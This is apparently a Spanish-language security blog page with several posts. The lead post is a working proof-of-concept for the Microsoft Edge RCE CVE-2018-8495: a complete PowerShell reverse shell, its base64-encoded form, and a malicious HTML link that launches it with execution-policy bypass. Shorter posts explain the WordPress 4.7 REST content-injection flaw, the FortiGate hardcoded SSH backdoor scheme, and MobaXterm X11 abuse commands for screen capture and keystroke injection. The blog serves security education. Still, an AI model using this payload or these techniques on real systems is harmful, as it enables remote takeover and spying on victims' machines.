Bienvenido a mi Blog

Seguridad informática

Leer mi Blog

Microsoft Edge RCE – CVE-2018-8495

Microsoft Edge logo

PoC para ejecutar una shell inversa en Powershell a partir de la PoC del autor (https://leucosite.com/Microsoft-Edge-RCE/) para la vulnerabilidad de RCE en Microsoft Edge.

Primero necesitamos crear un socket que haga una conexión inversa en Powershell:

$socket = new-object System.Net.Sockets.TcpClient('x.x.x.x', 8080);if($socket -eq $null){exit 1}$stream = $socket.GetStream();$writer = new-object System.IO.StreamWriter($stream);$buffer = new-object System.Byte[] 1024;$encoding = new-object System.Text.AsciiEncoding;do{$writer.Write("BertoShell> ");$writer.Flush();$read = $null;while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0,1024)) -eq $null){}$out = $encoding.GetString($buffer, 0,$read).Replace("`r`n","").Replace("`n","");if(!$out.equals("exit")){$out = $out.split(' ');$res = [string](&$out[0] $out[1..$out.length]);if($res -ne $null){ $writer.WriteLine($res)}}}While (!$out.equals("exit"))$writer.close();$socket.close();

La codificamos en base64:

user@kali1:~$ cat ~/shellcode.txt | iconv --to-code UTF-16LE |base64

Y sustituimos la llamada a la calculadora en la PoC del autor por la llamando a nuestra shell en Powershell:

<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc JABzAG8AYwBrAGUAdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQA5ADQALgA0ADUALgAxADYAOAAnACwAIAA4ADAAOAAwACkAOwBpAGYAKAAkAHMAbwBjAGsAZQB0ACAALQBlAHEAIAAkAG4AdQBsAGwAKQB7AGUAeABpAHQAIAAxAH0AJABzAHQAcgBlAGEAbQAgAD0AIAAkAHMAbwBjAGsAZQB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7ACQAYgB1AGYAZgBlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcAOwBkAG8AewAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAIgBCAGUAcgB0AG8AUwBoAGUAbABsAD4AIAAiACkAOwAkAHcAcgBpAHQAZQByAC4ARgBsAHUAcwBoACgAKQA7ACQAcgBlAGEAZAAgAD0AIAAkAG4AdQBsAGwAOwB3AGgAaQBsAGUAKAAkAHMAdAByAGUAYQBtAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQAgAC0AbwByACAAKAAkAHIAZQBhAGQAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAMQAwADIANAApACkAIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAfQAkAG8AdQB0ACAAPQAgACQAZQBuAGMAbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAJAByAGUAYQBkACkALgBSAGUAcABsAGEAYwBlACgAIgBgAHIAYABuACIALAAiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAGAAbgAiACwAIgAiACkAOwBpAGYAKAAhACQAbwB1AHQALgBlAHEAdQBhAGwAcwAoACIAZQB4AGkAdAAiACkAKQB7ACQAbwB1AHQAIAA9ACAAJABvAHUAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAOwAkAHIAZQBzACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACYAJABvAHUAdABbADAAXQAgACQAbwB1AHQAWwAxAC4ALgAkAG8AdQB0AC4AbABlAG4AZwB0AGgAXQApADsAaQBmACgAJAByAGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAgACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUATABpAG4AZQAoACQAcgBlAHMAKQB9AH0AfQBXAGgAaQBsAGUAIAAoACEAJABvAHUAdAAuAGUAcQB1AGEAbABzACgAIgBlAHgAaQB0ACIAKQApACQAdwByAGkAdABlAHIALgBjAGwAbwBzAGUAKAApADsAJABzAG8AYwBrAGUAdAAuAGMAbABvAHMAZQAoACkAOwA=;"'>test</a>
<script>
window.onkeydown=e=>{
window.onkeydown=z={};
q.click()
}
</script>

WordPress 4.7.0/4.7.1 Unauthenticated Content Injection

wordpress-vulnerability

Breves nostas de la vulnerabilidad:

La vulnerabilidad reside en la API Rest de WordPress. En nuestro caso se encuentra en http://albertomagallon.es/wp-json/
Se puede encontrar buscando en el código fuente de la página la URL: https://api.w.org/

Cuando se actualiza una entrada se envía a la API Rest el identificador de la entrada a actualizar. Este identificador debe de ser númerico.
Si se añaden carácteres alfanuméricos detrás del identificador, la función que valida los permisos (update_item_permissions_check) no encuentra la entrada y no valida nada.

Wordpress API Rest vuln 1

WordPress API Rest vuln 1

Aquí viene el primer error, aún no habiendo validado ningún permiso porque no ha encontrado la entrada que hay que actualizar, el flujo de ejecución continúa hacia la función que actualiza la entrada (update_item).
En este punto lo lógico sería que de nuevo tampoco encontrara la entrada pero en cambio hace la búsqueda de otra manera. Antes de llamar a la función get_post para búscar la entrada con el valor alfanumérico que le hemos pasado, hace un cast de la variable con (int)$request[‘id’];.

Wordpress API Rest vuln 2

WordPress API Rest vuln 2

Esto en PHP resulta en una omisión de los carácteres alfabéticos quedando únicamente los númericos. Es decir, ésta vez la función si que encuentra la entrada y la actualiza sin tener permisos. El segundo error.

La salida del siguiente código:


#!/usr/bin/php
<?php
$id = ((int)"1234ABCDE");
echo $id
?>

es 1234

Detalles de la vulnerabilidad en el blog de Sucuri: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

Exploit en github: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab

Exploit-db: https://www.exploit-db.com/exploits/41223/

 

Backdoor en FortiGate OS desde la version 4.x hasta la 5.0.7

No ha pasado ni un mes del último backdoor publicado en los appliance Juniper y hoy se ha publicado otro en FortiGate.  Se trata de nuevo de una contraseña hardcodeada aunque en este caso el acceso no es 'directo'.  A través de SSH utilizando el usuario Fortimanager_Access se genera un clave numérica que combinada con otras cadenas fijas como 'FGTAbc11*xy+Qqz27' y hasheando el resultado en SHA1 obtenemos la contraseña.

No ha pasado ni un mes del último backdoor publicado en los appliance Juniper y hoy se ha publicado otro en FortiGate. Se trata de nuevo de una contraseña hardcodeada aunque en este caso el acceso no es ‘directo’. A través de SSH utilizando el usuario Fortimanager_Access se genera un clave numérica que combinada con otras cadenas fijas como ‘FGTAbc11*xy+Qqz27’ y hasheando el resultado en SHA1 obtenemos la contraseña.

Read more

Tor2Web con más de 3000 enlaces Tor actualizados a Enero de 2016

Tor2web logo

Tor2web es un proyecto de software que permite acceder a la red Tor sin la obligación de tener que correr en tu equipo una instancia de Tor, normalmente a través del propio navegador de Tor. Es decir, un usuario corriente, a través de cualquier navegador, puede acceder a un servicio oculto fácilmente.

Read more

CTF No cON Name 2015

CTF NoConName

El pasado Jueves participé en el CTF de la No cON Name de Barcelona, el congreso de seguridad más antiguo en España y que celebra su duodécimo aniversario. La competición de CTF (Capture de flag) se celebra en modalidad Jeopardy, resolviendo retos en múltiples categorías (seguridad web, móvil, programación, esteganografía, criptografía, etc). Y congregó a ocho equipos de cuatro participantes cada uno excepto un francés que iba por libre y nos ganó a todos.

Read more

Técnicas de rastreo de usuarios en la web

El último informe especial de FireEye aborda el tema del rastreo de usuarios que navegan con normalidad por la web.  Desde hace mucho tiempo son conocidas diversas técnicas para lograr este objetivo.  Evercookies, supercookies y abuso de herramientas de analítica web están a la orden del día para eliminar la privacidad de cualquiera que navegue habitualmente por la web.

El último informe especial de FireEye aborda el tema del rastreo de usuarios que navegan con normalidad por la web. Desde hace mucho tiempo son conocidas diversas técnicas para lograr este objetivo. Evercookies, supercookies y abuso de herramientas de analítica web están a la orden del día para eliminar la privacidad de cualquiera que navegue habitualmente por la web.

Read more

KeeFarce para robar contraseñas de KeePass

KeeFarce Logo

Utilizar una contraseña compleja para cada servicio obliga a utilizar herramientas como KeePass para recordar todas ellas. Keepass es un gestor de contraseñas que almacena todas las credenciales en una base de datos cifrada. Para acceder a ella se utiliza una contraseña maestra junto con otros factores de autenticación para darle más robustez.

Read more

Vulnerabilidad en el X11 de MobaXterm

La herramienta MobaXterm se trata de un cliente SSH (entre otros protocolos) igual que el famoso software PuTTY.  Hace unos días ha sido publicada una «vulnerabilidad» identificada con el CVE-2015-7244 que consiste en una mala configuración en el servidor X11 del que dispone la herramienta.  Dicho servidor se encuentra por defecto abierto a cualquier IP y sin autenticación.  Hoy hemos estado jugando un poco.

Desde un equipo remoto podemos indicar que la salida del monitor es el equipo que está ejecutando MobaXterm.

DISPLAY="IP_Equipo_MobaXterm:0"

Y a partir de aquí el resto de comandos que el terminal trate de sacar por el entorno gráfico irá a parar al equipo con MobaXterm.

Por ejemplo podemos enviar imágenes.

eog imagen

Enviar comandos

xodotool key F1

O capturar lo que se esté viendo en el X11 del MobaXterm.

import -window root screen.ps

El MobaXterm es vulnerable hasta la versión 8.3 y se puede solucionar bien actualizando o bien desactivando el servidor X11 desde la configuración de la herramienta.

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies